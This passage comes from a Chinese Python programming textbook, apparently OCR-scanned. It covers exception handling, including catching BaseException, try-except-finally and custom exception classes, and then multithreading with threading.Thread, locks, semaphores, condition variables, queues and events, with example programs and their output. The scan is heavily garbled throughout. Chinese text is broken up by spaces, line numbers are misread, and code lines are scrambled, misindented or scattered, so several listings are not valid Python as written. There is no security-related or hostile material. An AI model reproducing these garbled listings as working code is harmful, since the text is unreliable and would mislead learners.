第 17 一 19 行 ,如 果 没 有 引发 异常 , 则 输出 计算 结果 ,执行 break 语句 退出 循环 。 


6.3 捕获 所 有 异常 


进行 编程 开发 时 ,会 有 研发 人 员 感 叹 我 不 知道 会 引发 什么 异常 呀 ?这 时 候 怎 么 办 呢 ? 
这 时 ,只 要 捕获 异常 类 的 父 类 ,就 可 以 捕获 所 有 异常 了 。 所 有 异常 类 的 父 类 是 
BaseException, 只 要 把 刚才 的 例 程 稍 加 改造 ,就 可 以 捕获 所 有 的 异常 了 。 

例 [ch6_3_BaseException. py】 


时 #9coding:utf—8 

2 lista= [0,1,2,3,4,5,6] 

3. while True: 

4 nstr = input(" 请 输入 列表 的 下 标 : ") 
$e try: 

6 nint = int(nstr) 

7 print(30/lista[nint]) 

8 except BaseException as e: 

9 print(" 发 生 异 常 了 ") 

10. print(e) 

FE else: 

12. print("30/%d= %d"%(lista[nint], 30/lista[nint])) 
#3 break 

程序 运行 结果 


请 输入 列表 的 下 标 : 0 
发 生 异 常 了 

division by zero 

请 输入 列表 的 下 标 : 7 
发 生 异 常 了 

list index out of range 
请 输入 列表 的 下 标 : a 
发 生 异 常 了 

invalid literal for int() with base 10: 'a' 
请 输入 列表 的 下 标 : 3 
10.0 

30/3=10 





6.4 try...except...finally... 语 句 


try...except... 语 句 后 附加 上 finally 语句 则 表示 : 不 管 try 语句 捕获 异常 与 否 ,最 后 都 
将 会 执行 finally 语句 后 面 的 代码 。 
下 例 输入 字符 串 型 “岁数 ”, 然 后 转换 为 整数 型 , 若 无 异常 , 则 输出 岁数 ,最 后 输出 
“再 见 ”。 
例 [ch6_4try_finally. py】 
#coding:utf -8 
s= input(" 请 输入 你 的 岁数 :") 
try: 
i= int(s) 


print(err) 
else: 
print(" 你 的 岁数 是 %d" % i) 
finally: 
10. print(" 再 见 !") 


程序 运行 结果 : 


4 
2 
3 
4 
5. except Exception as err: 
6 
7 
8 
9 


请 输入 你 的 岁数 :a5 

invalid literal for int() with base 10: 'a5 
再 见 ! 

请 输入 你 的 岁数 :18 

你 的 岁数 是 18 

再 见 ! 


程序 执行 了 两 次 ,第 一 次 输入 a5 ,引发 异常 ; 第 二 次 输入 18, 未 引发 异常 。 从 执行 结果 
可 以 看 出 ,不 管 是 否 引 发 异常 ,finally 语句 都 会 被 执行 。 


6.5 创建 自 定义 异常 类 


之 前 捕获 并 处 理 的 异常 都 是 Python 内 置 的 异常 ,如 果 需 要 处 理 具有 特殊 功能 的 异常 ， 
可 以 自己 定义 异常 类 ,异常 类 的 父 类 是 Exception 。 
下 面 创建 自 定义 异常 类 MyError: 


>>> class MyError (Exception): 
def __init (self,value): 
self. value = value 
def __str_ (self): 
return repr(self. value) 


>>> try: 
raise MyError(2 * 2) 
except MyError as e: 
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print(" 我 自 定义 的 异常 引发 了 ",e. value) 
我 自 定义 的 异常 引发 了 4 
MyError 类 继承 自 Exception 类 ,并 覆盖 了 父 类 的 _init_0 〇 方法 和 _ str_0 〇 方法 。 
这 里 使 用 了 raise 主动 引发 异常 ,raise 语句 的 语法 是 : 


raise SomeException([args]) 


习 题 


简 答 题 

1. 异常 与 错误 有 何 区 别 ? 

2. try...except... 和 try...except...finally... 有 什么 不 同 ? 
3. Python 异常 处 理 结 构 有 哪 几 种 形式 ? 


计算 机 程序 是 由 指令 序列 组 成 的 ,该 序列 在 计算 机 的 CPU 中 按照 同步 顺序 执行 ,在 单 
任务 时 代 ,无 论 程序 是 按 步 又 顺序 执行 的 ,还 是 包含 多 个 子 任务 ,程序 都 是 按照 顺序 去 执行 
的 。 比 如 ,在 DOS 下 ,你 不 能 一 边 编辑 书稿 ,一 边 听 音 乐 。 随 着 软 硬 件 处 理 能 力 的 提高 ,多 
任务 并 发 执行 成 为 常态 ,你 可 以 一 边 处 理 着 各 种 报表 ,一 边 听 着 音乐 ,一边 关注 着 网 络 新 闻 。 

谈 到 多 任务 ,就 涉及 两 个 重要 的 概念 : 进程 和 线程 。 计 算 机 程序 是 保存 在 存储 介质 上 
的 可 执行 的 二 进 制 文件 ,把 它 加 载 到 内 存 中 并 执行 , 它 就 有 了 生命 周期 ,也 就 形成 了 进程 的 
概念 , 它 是 关于 某 数据 集合 上 的 一 次 运行 活动 ,是 系统 进行 资源 分 配 和 调度 的 基本 单位 。 每 
个 进程 都 拥有 自己 的 地 址 空间 内存. 数据 栈 ,因此 ,进程 间 只 能 采用 通信 的 方式 共享 信息 。 
与 进程 相 比 ,线程 要 轻 量 化 很 多 ,多 个 线程 是 在 同一 个 进程 下 执行 的 ,并 共享 相同 的 上 下 文 。 
有 了 进程 和 线程 后 ,就 可 以 实现 多 任务 编程 了 。 多 任务 编程 的 好 处 是 什么 呢 ? 粗略 地 可 以 
概括 为 以 下 三 个 方面 。 

(1) 可 以 把 一 个 大 的 任务 分 割 成 多 个 独立 的 小 任务 ,并 把 这 些小 任务 放 到 后 台 并 行 运 
行 ,提高 了 任务 的 执行 速度 和 效率 。 

(2) 可 以 把 用 户 界面 设计 得 更 加 友好 。 比 如 ,用 户 单 击 某 个 按钮 后 ,调用 了 一 个 比较 耗 
时 的 任务 ,这 时 ,可 以 把 任务 放 到 后 台 执 行 ,在 用 户 界面 弹出 一 个 进度 条 显示 处 理 的 进度 。 

(3) 在 一 些 处 理 输入 /输出 的 程序 中 ,使 用 多 任务 编程 技术 ,会 提高 程序 的 执行 效率 。 
如 等 待 用 户 输入 ,文件 读 / 写 .网 络 收发 数据 等 。 使 用 多 任务 编程 技术 就 可 以 同时 处 理 多 个 
任务 ,而 不 会 因为 某 个 子 任务 的 停顿 ,使 整个 任务 出 现 阻塞 。 


7.1 多 线程 编程 


7.1.1 多 线程 的 实现 


Python 3 通过 两 个 标准 库 _thread 和 threading 提供 对 线程 的 支持 。 早 期 的 thread 模 
块 已 经 被 废弃 ,在 Python 3 中 将 thread 重 命名 为 " thread" ，thread 提供 了 低级 别 的 、 原始 
的 线程 以 及 一 个 简单 的 锁 , 它 与 threading 模块 相 比 ,功能 比较 有 限 ,而 threading 模块 使 用 


更 方便 ,功能 更 强大 。 这 里 就 不 再 介绍 _thread 模块 ,而 重点 介绍 threading 模块 。 
threading 模块 的 常用 方法 与 属性 如 表 7-1 所 示 。 


表 7-1 threading 模块 的 常用 方法 与 属性 












































函数 或 属性 描 述 
返回 正在 运行 的 线程 数量 ,与 len(threading. enumerate()) 有 相同 的 
threading. activeCount( ) 
结果 
threading. BoundedSemaphore | 与 Semaphore 相似 ,只 是 它 不 允许 超过 初始 值 
WE 条 件 变量 对 象 ,能 让 一 个 线程 停 下 来 ,等 待 其 他 线程 满足 了 某 一 个 
threading. Condition 
“条 件 
threading. currentThread() 返回 当前 的 线程 变量 
threading. enumerate() 返回 一 个 包含 正在 运行 的 线程 的 list 
threading. Event 通用 事件 变量 ,一 个 线程 通知 事件 ,其 他 线程 等 待 事件 
threading. get_ident() 返回 当前 线程 的 索引 ,这 个 索引 是 一 个 非 0 的 整数 
threading. Lock 锁 源 语 对象 
返回 主线 程 ,正常 情况 下 ,主线 程 就 是 Python 解释 器 运行 时 开始 的 那 
threading. main_thread() 
个 线程 
threading. RLock 可 重 入 锁 对 象 
threading. Semaphore 信号 量 
threading. setpeofile() 设 定 profile function 
threading. settrace(func) 当 开始 调用 threading 模块 时 设 定 跟踪 函 数 (trace function ) 
threading. Thread 一 个 线程 的 执行 对 象 





Python 3 的 线程 编程 方式 有 以 下 两 种 。 

(1) 创建 一 个 threading. Thread 类 实例 ,传递 给 它 一 个 将 在 线程 中 执行 的 函数 。 

(2) 创建 一 个 类 对 象 , 该 类 继承 threading. Thread 类 。 

下 面 就 以 实例 来 说 明 多 线程 程序 的 设计 。 

1. 在 thread 实例 中 调用 函数 

在 这 个 例子 中 , 先 创 建 一 个 threading. Thread 对 象 ,把 函数 传递 给 它 ,线程 执行 的 时 
候 , 函 数 就 执行 了 。 

例 [thread_func. py】 

井 coding:utf 一 8 


import threading 
import time 


入 下 者 


1 

2 

3 

4 

5. def func(secs) : 
6 

7 while n< secs: 
8 

9 


n= n+1 
timestr = time. strftime("%H:%M:$%S") 

10. print(" 现 在 是 %s, 线 程 %s 正在 运行 ……\n" % (timestr, threading. current_thread 

().name)) 

4 time. sleep(1) 


12. timestr = time. strftime(" %H:%M:%S") 
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gw print(" 现 在 是 % s, 线 程 $s 结束 了 \n" % (timestr，threading. current_thread( ) .name) ) 
14. 

15. def main() : 

16. print(time. ctime()) 

3 print(" 线 程 %s 正在 运行 ……" % threading. currentThread(). name) 
18. tl = threading. Thread(target = func,args= (2,)) 
19. t2 = threading. Thread(target = func,args= (3,)) 
20. t3 = threading. Thread(target = func,args = (4,)) 
2 tl1. start() 

22; t2. start() 

23. t3. start() 

24. tl. join() 

25. t2. join() 

26. t3. join() 

print(" 所 有 线程 都 结束 了 ",time. ctime()) 

28. 

29. if name ==" main ": 

30. main( ) 

程序 运行 结果 : 


Sat Jul 22 11:59:34 2017 

线程 MainThread 正在 运行 … 

现在 是 11:59:34, 线 程 Thread- 1 正在 运行 …… 
现在 是 11:59:34, 线 程 Thread- 2 正在 运行 …… 
现在 是 11:59:34, 线 程 Thread -3 正在 运行 …… 





现在 是 11:59:35, 线 程 Thread- 1 正在 运行 …… 
现在 是 11:59:35, 线 程 Thread- 2 正在 运行 …… 
现在 是 11:59:35, 线 程 Thread- 3 正在 运行 …… 





现在 是 11:59:36, 线 程 Thread- 1 结束 了 
现在 是 11:59:36, 线 程 Thread- 2 正在 运行 …… 
现在 是 11:59:36, 线程 Thread- 3 正在 运行 …… 


现在 是 11:59:37, 线 程 Thread -2 结束 了 
现在 是 11:59:37, 线 程 Thread- 3 正在 运行 …… 


现在 是 11:59:39, 线 程 Thread - 3 结束 了 


所 有 线程 都 结束 了 Sat Jul 22 11:59:39 2017 


(全 说明: 第 5 行 ,定义 一 个 函数 func() , 供 threading. Thread 线程 调用 。 


第 9 一 11 行 ,func() 函 数 中 定义 了 一 个 循环 ,每 循环 一 次 ,输出 一 次 时 间 与 线程 名 ,然后 


休眠 1s。 


第 15 行 ,main() 函 数 中 首先 创建 一 个 threading. Thread 对 象 ,并 把 要 在 线程 中 执行 的 
函数 名 作为 参数 传 给 target 参数 , 传 给 函数 的 参数 放 在 args 元 组 中 ,因为 只 有 一 个 休眠 的 


秒 数 作 元 组 元 素 , 所 以 args 套数 是 (2,), 即 秒 数 后 加 了 一 个 过 号 。 
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第 18 一 23 行 ,threading. Thread 对 象 创建 完成 后 ,调用 start() 方 法 启动 线程 。 
第 24 一 26 行 ,join() 方 法 等 到 线程 结束 。 
从 程序 的 输出 结果 可 以 看 出 ,第 1s、 第 2s 时 ,3 个 线程 在 并 行 地 运行 ; 第 3s 线程 1 结束 
了 ; 第 4s 线 程 2 结束 了 ; 第 5s 线程 3 结束 了 。 所 有 线程 结束 后 ,主线 程 mainthread 才 


结束 。 


2. 继承 threading. Thread 类 实现 多 线程 
实现 多 线程 的 第 二 种 方式 是 创建 一 个 继承 自 threading. Thread 的 类 ,在 该 类 中 ,实现 _ 
init_() 方 法 对 类 进行 初始 化 ,覆盖 run() 方 法 ,run() 方 法 是 进行 线程 编码 的 地 方 , 把 多 线程 
要 实现 的 功能 放 在 此 处 。 
例 【[thread_class. py】 


. ta 
bb 
. ta. start() 
. tb. start() 
. print(" 目 前 有 %d 个 线程 正在 运行 ……" % threading. activeCount()) 
.Print(" 它 们 是 :") 

. for item in threading. enumerate( ) : 


#coding:utf -8 

import threading 

import time 

from random import randint 


class MyThread( threading. Thread) : 
def init (self,loops=5): 
threading. Thread. _init (self) 
self. loops = loops 
def run(self) : 
for i in range(self. loops) : 


print(" 当 前 线程 %s 正在 运行 


time. sleep(randint(1,3)) 


MyThread( ) 
MyThread( ) 


print( item) 


. ta. join() 
. tb. join() 
。 print(" 所 有 线程 都 结束 了 ") 


程序 运行 结果 : 


> python thread class.py 

当前 线程 Thread- 1 正在 运行 …… 

当前 线程 Thread- 2 正在 运行 … 

目前 有 3 个 线程 正在 运行 … 

它们 是 : 

<_MainThread(MainThread, started 15752)> 
< MyThread(Thread — 1, started 8464)> 

< MyThread( Thread - 2, started 5064)> 
当前 线程 Thread- 2 正在 运行 …… 


井 MYThread 类 继承 threading. Thread 类 
# 覆 盖 _init_() 方 法 
# 调 用 父 类 的 _init_() 方 法 


# 材 盖 run() 方 法 


\n" % threading. current thread( ). getName 


井 创建 线程 ta 
# 创建 线程 

井 启动 线程 ta 
# 启 动 线程 tb 
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当前 线程 Thread- 1 正在 运行 … 
当前 线程 Thread- 1 正在 运行 …… 
当前 线程 Thread - 2 正在 运行 
当前 线程 Thread- 1 正在 运行 …… 
当前 线程 Thread- 1 正在 运行 … 
当前 线程 Thread- 2 正在 运行 …… 
当前 线程 Thread- 2 正在 运行 …… 
所 有 线程 都 结束 了 





7.1.2 多 线程 的 同步 与 通信 


1. 线程 锁 
多 进程 和 多 线程 都 可 以 并 行 地 执行 ,但 进程 与 线程 最 大 的 区 别 在 于 : 在 多 进程 中 ,每 个 
变量 都 有 一 个 自己 的 备份 ,进程 间 变 量 互 不 影响 。 而 在 多 线程 中 ,所 有 全 局 变量 都 是 共享 
的 , 若 多 个 线程 都 访问 某 一 变量 ,可 能 会 造成 涨 数据 ,这 时 就 需要 线程 锁 , 对 临界 代码 段 进行 
锁定 ,从 而 保证 数据 的 正确 性 。 
例 【[thread_lockl. py】 
#coding:utf -8 
import threading 
import time 


def changeit(m) : 
global globaln 


4 
2 
坊 
4 
5. globaln = 0 
6 
7 
8 b = globaln + m 


globaln = b 
10. b= globaln 一 m 
11。 globaln = b 
12， 
13. def run(n) : 
14. for i in range(1000000) : 
EC changeit(n) 
16. 


17. tl = threading.Thread(target = run,args= (3,)) 
18. t2 = threading.Thread(target = run,args= (7,)) 
19. tl. start() 

20. t2. start() 

21. tl. join() 

22. t2. join() 

23. print("globaln = %d"%globaln) 
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可 以 看 出 ,在 changeit() 函 数 中 对 全 局 变量 globaln 进行 加 m 与 减 m 操作 ,最 终 执行 
果 globaln 应 该 是 0, 但 程序 实际 执行 结果 不 一 定 为 0, 究 其 原因 是 因为 两 个 线程 是 交替 执 
的 ,函数 changeit() 可 能 会 出 现下 列 的 执行 顺序 : 

初始 值 : globaln 二 0。 


结 
行 


tl:b = globaln + 3 井 b=0+3=3 

t2: b = globaln + 7 井 b=0+7=7 

t2: globaln = b 井 b=7，globaln=7 
tl: globaln = b 井 b=3，globaln=3 
t2: b = globaln 一 7 #b=3-7= -4 
tl: b= globaln—3 #b=3-3=0 

tl: globaln = b #9globaln=0 

t2: globaln = b #9globaln= -4 

最 终结 果 为 : 一 4。 


避免 这 种 情况 出 现 的 办 法 就 是 使 用 线程 锁 。 程 序 中 先 创建 一 个 线程 锁 , 一 个 线程 获取 
线程 锁 后 ,其 他 线程 就 不 能 获取 线程 锁 , 持 有 线程 锁 的 线程 可 以 执行 ,其 他 线程 不 能 执行 ,只 
有 持 有 线程 锁 的 线程 释放 线程 锁 后 ,其 他 线程 才能 获取 线程 锁 , 执 行 代码 ,这 样 就 不 会 出 现 
线程 交替 执行 的 情况 。 受 线程 锁 保 护 的 代码 段 称 为 临界 区 。 对 thread_lock1. py 程序 的 改 
进 如 例 [thread_lock2. py 了 所 示 ,加 入 线程 锁 功 能 后 ,防止 了 涨 数 据 的 出 现 。 
例 【[thread_lock2. py】 
井 coding:utf 一 8 


import threading 
import time 


lock = threading. Lock() # 创建 线程 锁 
def changeit(m) : 


1 
2 
3 
4 
5. globaln = 0 
6 
7 
8 global globaln 


lock.acquire( ) # 获取 线程 锁 
10. try: 
11, b = globaln + m 
12; globaln = b 
13, b = globaln ~ m 
14. globaln = b 
15. finally: 
16. lock. release() # 释放 线程 锁 
Ey 
18. def run(n): 
19. for i in range(1000000) : 
20. changeit(n) 


21. 
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.tl = threading.Thread(target = run,args= (3,)) 
. t2 = threading.Thread(target = run,args= (7,)) 
. t1. start() 

. t2. start() 

. t1. join() 

. t2.join() 

. Pprint("globaln = %d"%globaln) 


(本 说明: 程序 首先 创建 线程 锁 , 一 个 线程 在 函数 changeit() 中 获取 线程 镇 ,这 时 其 他 
线程 就 不 能 再 持 有 线程 锁 , 该 线程 持 有 线程 锁 后 ,程序 的 第 11 一 14 行 就 能 顺序 执行 ,不 会 出 
现 交 替 执行 的 情况 ,也 就 不 会 产生 涨 数据 ,整个 程序 的 最 终结 果 就 是 0 了 。 

2. 信号 量 

信号 量 是 多 线程 环境 下 ,对 线程 访问 并 发 数 进行 控制 的 一 种 机 制 。 进 入 关键 代码 段 执 
行 之 前 , 先 获 取 一 个 信号 量 ,关键 代码 段 执 行 完成 后 ,释放 信号 量 。 信 和 号 量 管理 着 一 个 内 置 
的 计数 器 ,获取 信号 量 时 ,计数 器 减 1, 释 放 信号 量 时 ,计数 器 加 1, 计 数 器 不 能 小 于 0, 当 信 
号 量 为 0 时 ,可 以 调用 acquire() 方 法 阻塞 线程 至 锁定 状态 ,直至 其 他 线程 调用 release( ) 方 
法 释放 信号 量 。 信 号 量 通常 用 于 同步 一 些 有 “访客 上 限 ” 的 对 象 ,如 打印 机 、 连 接 池 等 资源 。 
如 下 例 中 ,线程 将 访问 某 一 资源 ,该 资源 的 访问 量 上 限 为 5, 通 过 设置 信号 量 的 计数 器 为 5， 
达到 控制 访问 资源 数 的 目的 。 

例 [thread_Semaphore. py】 


#encoding:utf -8 
import threading 
import time 


threads = [] 
s = threading. Semaphore(5) # 创 建 信号 量 ,计数 器 初始 值 为 5 
def visitit() : 
s.acquire() # 加 锁 , 信号 量 减 1 
try: 
print("%s 访问 了 资源 \n" % threading. currentThread( ) . getName()) 
time. sleep(0.1) 


finally: 
s.release() # 释放 锁 ,信号 量 加 1 
print("%s 释放 了 资源 \n" % threading. currentThread().getName()) 

. def main(): 

for i in range(0, 20): # 创建 20 个 线程 
t = threading. Thread(target = visitit) # 线 程 中 调用 visitit() 函 数 
threads. append(t) # 将 线程 添加 到 threads 列表 

for i in range(0,20) : # 启 动 20 个 线程 
threads[i]. start() 

for i in range(0,20) : # 等 待 20 个 线程 运行 结束 


threads[i]. join() 
Print(" 所 有 线程 已 经 执行 完了 ") 
主 _name == "main ": 


main( ) 
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Thread 一 1 访问 了 资源 
Thread -5 访问 了 资源 
Thread -3 访问 了 资源 
Thread -2 访问 了 资源 
Thread -4 访问 了 资源 


Thread- 1 释放 了 资源 
Thread -6 访问 了 资源 
Thread -4 释放 了 资源 
Thread -2 释放 了 资源 
Thread- 8 访问 了 资源 
Thread- 3 释放 了 资源 
Thread -7 访问 了 资源 
Thread- 5 释放 了 资源 
Thread - 10 访问 了 资源 
Thread -9 访问 了 资源 


Thread- 8 释放 了 资源 
Thread- 11 访问 了 资源 
Thread -6 释放 了 资源 
Thread - 12 访问 了 资源 
Thread -10 释放 了 资源 
Thread - 13 访问 了 资源 
Thread- 7 释放 了 资源 
Thread- 9 释放 了 资源 
Thread- 14 访问 了 资源 
Thread- 15 访问 了 资源 


Thread 一 11 释放 了 资源 
Thread - 16 访问 了 资源 
Thread- 17 访问 了 资源 
Thread- 12 释放 了 资源 
Thread- 13 释放 了 资源 
Thread- 18 访问 了 资源 
Thread - 19 访问 了 资源 
Thread- 14 释放 了 资源 
Thread- 15 释放 了 资源 
Thread - 20 访问 了 资源 


Thread- 17 释放 了 资源 
Thread- 16 释放 了 资源 
Thread -19 释放 了 资源 
Thread- 18 释放 了 资源 
Thread - 20 释放 了 资源 


所 有 线程 已 经 执行 完了 


程序 执行 的 结果 说 明 ,程序 的 信号 量 设置 为 5, 在 同一 时 间 内 ,只 有 5 个 线程 在 访问 某 
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资源 ,尽管 有 的 线程 释放 资源 ,有 的 线程 获取 了 资源 ,总 体 上 ,只 有 5 个 线程 在 访问 资源 。 

3. 条 件 变量 

条 件 变量 机 制 是 在 满足 了 特定 的 条 件 后 ,线程 才 可 以 访问 相关 的 数据 。 它 使 用 
Condition 类 来 完成 ,由 于 它 也 可 以 像 锁 机 制 那样 用 ,所 以 它 也 有 acquire() 方 法 和 release() 
方法 ,而 且 它 还 有 wait() .notify() .notifyAll() 方 法 。 

(1) threading. Condition([lock]): 创建 一 个 condition ,支持 从 外 界 引用 一 个 Lock 对 
象 (适用 于 多 个 condtion 共用 一 个 Lock 的 情况 ) ,默认 是 创建 一 个 新 的 Lock 对 象 。 

(2) wait([timeout]) : 线程 挂 起 ,直到 收 到 一 个 notify 通知 或 者 超时 (可 选 的 , 浮 点 数 ， 
单位 是 秒 (s) ) 才 会 被 唤醒 继续 运行 。wait() 必 须 在 已 获得 Lock 前 提 下 才能 调用 ,否则 会 触 
发 RuntimeError。 调 用 wait() 方 法 会 释放 Lock ,直至 该 线程 被 notify() 方 法 .notifyAll() 
方法 或 者 超时 线程 又 重新 获得 Lock 。 

(3) notify(n 二 1): 通知 其 他 线程 ,那些 挂 起 的 线程 接 到 这 个 通知 之 后 会 开始 运行 , 默 
认 是 通知 一 个 正 等 待 该 condition 的 线程 ,最 多 则 唤醒 n 个 等 待 的 线程 。notify() 方 法 必须 
在 已 获得 Lock 的 前 提 下 才能 被 调用 ,和 否则 会 触发 RuntimeError。notify() 方 法 不 会 主动 释 
放 Lock。 

(4) notifyAl1(O) : 如 果 wait() 方 法 状态 线程 比较 多 ,notifyAll() 方 法 的 作用 就 是 通知 所 
有 线程 (这 个 一 般 用 得 少 ) 。 

下 面 是 一 个 简单 的 生产 消费 者 模型 ,通过 条 件 变量 控制 产品 数量 的 增 减 ,调用 一 次 生产 
者 产品 数 就 会 加 1 ,调用 一 次 消费 者 产品 数 就 会 减 1 。 

例 [thread_condition. py】 


import threading 

2 import time 

3. from random import randint 

4. class Goods(): # 产 品类 
S$ def init (self): 

6 self.count = 0 

7 def add(self,num = 1): 

8. self. count += num 

外 def sub( self) : 

10. if self.count>=0: 

2。 self. count -= 1 

12. def empty(self) : 

13, return self.count <= 0 

14. 

15. class Producer(threading. Thread): # 生 产 者 类 
16. def init (self,condition, goods, loops = 20): 
threading. Thread. init (self) 

30 self.cond = condition 

19. self.goods = goods 

20. self. loops = loops 

21. def run(self): 

22. cond = self.cond 

23. goods = self.goods 


24. for i in range( self. loops) : 
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cond. acquire() # 锁 住 资源 

26. goods.add() 

27. print(" 产 品 数量 :", goods. count, "生产 者 线程 ") 
28. cond. notifyAll() # 响 醒 所 有 等 待 的 线程 -- > 其 实 就 是 唤醒 消费 者 进程 
29. cond. release() 井 解 锁 资 源 

30. time. sleep(randint(1,3)) 间 线程 休眠 1 一 3s 

34. 

32. class Consumer(threading. Thread) : # 消费 者 类 

33. def _init (self,condition, goods, loops = 20): 

34. threading. Thread. init (self) 

3 self. cond = condition 井 设 定 条 件 变 量 

36. self. goods = goods # 设 置 goods 对 象 实例 
Ey self. loops = loops # 设 定 线 程 循环 次 数 
38. def run(self): 

39; cond = self.cond 

40. goods = self.goods 

41. for i in range(self. loops) : 

42. time. sleep(randint(2,4) ) # 休眠 2 一 4s 

43. cond. acquire() # 锁 住 资源 

44. while goods. empty( ) : # 如 无 产品 则 让 线程 等 待 
45. cond. wait() 

46. goods. sub() 

47. print(" 产 品 数 量 :", goods. count, "消费 者 线程 ") 
48. cond, release( ) # 解 锁 资源 

49. 

50. g = Goods() 

51.c = threading. Condition() 


53. pro = Producer(c,g) 
54. pro. start() 


56. con = Consumer(c,g) 
57. con. start() 


4. 通过 队列 实现 线程 间 的 通信 

使 用 队列 进行 线程 间 同 步 是 常见 的 一 种 方法 , 它 可 以 让 线程 间 共 享 数据 。 队 列 类 包括 
FIFO( 先 入 先 出 ) 队 列 LifoQueue 和 优先 级 队列 (PriorityQueue) ,队列 可 以 实现 线程 间 同 步 
与 线程 安全 的 作用 。 队 列 常用 的 方法 有 以 下 几 种 。 

9 queue(size) :创建 一 个 大 小 为 size 的 Queue 对 象 。 

9 empty() :测试 队列 是 否 为 空 , 若 为 空 , 则 返回 True; 若 不 为 空 , 则 返回 False。 
full() :测试 队列 是 否 满 , 若 为 满 , 则 返回 True; 若 未 满 , 则 返回 False。 
2 put() :把 item 放 到 队列 中 ,如 果 给 了 block ,函数 会 一 直 阻 塞 到 队列 中 有 空间 为 止 。 


0 


2 dsize() :返回 队列 大 小 。 由 于 返回 值 时 ,队列 可 能 被 其 他 线程 修改 ,所 以 这 个 只 是 近 
似 值 。 

2 task_done() :在 完成 一 项 工作 之 后 ,Queue. task_done() 函数 向 任务 已 经 完成 的 队列 
发 送 一 个 信号 。 


2 join() :等 到 队列 为 空 , 再 执行 别 的 操作 。 
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上 例 的 生产 者 与 消费 者 例子 也 可 以 使 用 队列 来 实现 ,下 面 的 是 对 上 例 的 更 改 。 


例 [thread_queue. py】 


1. 井 encoding:utf -8 

总 import threading 

k import time 

4 import queue 

5. from random import randint 
6 

7 

8 

9 


class Goods() : 并 定义 Goods 类 
def init (self,q): 

self.q = q 
10. def add(self,message) : 
Et self.q. put (message) # 将 传人 的 产品 信息 压 入 队列 
重生: def sub(self) : 
1 if not self.q.empty() : # 若 队列 为 非 空 , 则 输出 下 面 信息 
14. print(" 消 费 了 : {}。\n". format(self.q.get())) # 取 出 队列 中 的 元 素 输出 
Ss 
16. class Producer(threading.Thread) : 
17, def __init_(self,goods,q,1loops= 20): 
18. threading. Thread. _ init (self) 
和 Self. goods = goods 
20. self.q = q 
2 self. loops = loops 
22: def run(self) : 
> 《网 goods = self.goods 
24. i=0 
325 for i in range(self. loops) : 
26. goods.add(" 第 {} 个 产品 ". format(i)) # 生 产 一 个 新 的 产品 
27. print(" 生 产 了 : 第 {} 个 产品 \n". format(i)) 
28. time. sleep(randint(1,3)) # 线 程 休眠 1 一 3s 
29. 
30. class Consumer(threading. Thread) : 
385 def __init_(self, goods, q): 
32, threading. Thread. _init (self) 
3 self.goods = goods 
34. self.q = q 
35， def run(self) : 
36. goods = self.goods 
37. while not self.q.empty(): ”# 若 队列 非 空 ,执行 下 面 代码 
38. goods. sub( ) # 消费 一 件 产品 
39. time. sleep(randint(2,5) ) # 线 程 休眠 2 一 5s 
40. 
41. q = queue. Queue(10) # 创 建 一 个 10 元 素 的 队列 
42. = Goods(q) 
43. 


44. pro = Producer(g,q) 
45. pro. start() 


47. con = Consumer(g,q) 
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48. con. start() 
程序 运行 结果 : 


生产 了 : 第 0 个 产品 
消费 了 : 第 0 个 产品 
生产 了 : 第 1 个 产品 
生产 了 : 第 2 个 产品 
消费 了 : 第 1 个 产品 
生产 了 : 第 3 个 产品 
肖 费 了 : 第 2 个 产品 
E 产 了 : 第 4 个 产品 
E 产 了 : 第 5 个 产品 
消费 了 : 第 3 个 产品 
生产 了 : 第 6 个 产品 
生产 了 : 第 7 个 产品 
消费 了 : 第 4 个 产品 
生产 了 : 第 8 个 产品 
生产 了 : 第 9 个 产品 
消费 了 : 第 5 个 产品 
生产 了 : 第 10 个 产品 
消费 了 : 第 6 个 产品 
生产 了 : 第 11 个 产品 
消费 了 : 第 7 个 产品 
生产 了 : 第 12 个 产品 
消费 了 : 第 8 个 产品 
生产 了 : 第 13 个 产品 
消费 了 : 第 9 个 产品 
生产 了 : 第 14 个 产品 
生产 了 : 第 15 个 产品 
生产 了 : 第 16 个 产品 
消费 了 : 第 10 个 产品 
生产 了 : 第 17 个 产品 
生产 了 : 第 18 个 产品 
消费 了 : 第 11 个 产品 
生产 了 : 第 19 个 产品 
消费 了 : 第 12 个 产品 
消费 了 : 第 13 个 产品 
消费 了 : 第 14 个 产品 
消费 了 : 第 15 个 产品 
消费 了 : 第 16 个 产品 
消费 了 : 第 17 个 产品 
消费 了 : 第 18 个 产品 
消费 了 : 第 19 个 产品 





(可 说 明 : 第 7 一 14 行 ,定义 Goods 类 。 类 中 定义 了 add(message) 方 法 和 sub() 方 法 。 
add() 方 法 用 于 生产 产品 ,sub() 方 法 用 于 消费 产品 。 

第 16 一 28 行 ,定义 了 Producer 类 , 它 继承 了 threading. Thread ,实现 了 多 线程 运行 , 实 
现 了 产品 的 生产 功能 ; 第 26 行 ,调用 Goods 类 的 add() 方 法 生产 一 个 产品 。 
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第 30 一 39 行 ,定义 了 Consumer 类 ,实现 产品 的 消费 , 它 也 实现 了 多 线程 运行 。 

第 38 行 ,调用 Goods 类 的 sub() 方 法 ,消费 一 个 产品 。 

由 于 Producer 类 中 ,线程 休眠 时 间 短 于 Consumer 类 ,因此 ,产品 的 生产 快 于 消费 。 所 
以 出 现 了 上 面 程序 运行 的 结果 。 

5. 通过 事件 实现 线程 间 通 信 

Python 提供 了 Event 对 象 用 于 线程 间 通 信 , 它 是 由 线程 设置 的 信号 标志 ,如 果 信 号 标 
志 位 为 假 , 则 线程 等 待 直到 信号 被 其 他 线程 设置 成 真 。Event 对 象 实现 了 简单 的 线程 通信 
机 制 , 它 提供 了 设置 信号 ,清除 信和 号、 等 待 等 功能 用 于 实现 线程 间 的 通信 。 

1) 设置 信号 

使 用 Event 对 象 的 set() 方 法 可 以 设置 Event 对 象 内 部 的 信号 标志 为 真 。Event 对 象 
提供 了 isSet() 方 法 来 判断 其 内 部 信号 标志 的 状态 , 当 使 用 Event 对 象 的 set() 方 法 后 ,isSet 
() 方 法 返回 真 。 

2) 清除 信号 

使 用 Event 对 象 的 clear() 方 法 可 以 清除 Event 对 象 内 部 的 信号 标志 ,即将 其 设 为 假 ， 
当 使 用 Event 对 象 的 clear() 方 法 后 ,isSet() 方 法 返回 假 。 

3) 等 待 

Event 对 象 的 wait() 方 法 只 有 在 内 部 信号 为 真 的 时 候 才 会 执行 并 完成 返回 。 当 Event 
对 象 的 内 部 信号 标志 为 假 时 , 则 wait() 方 法 一 直 等 待 到 其 为 真 时 才 返 回 。 

例 [thread_event. py】 


1 #coding:utf—8 

2. import threading 

3. import time 

4 

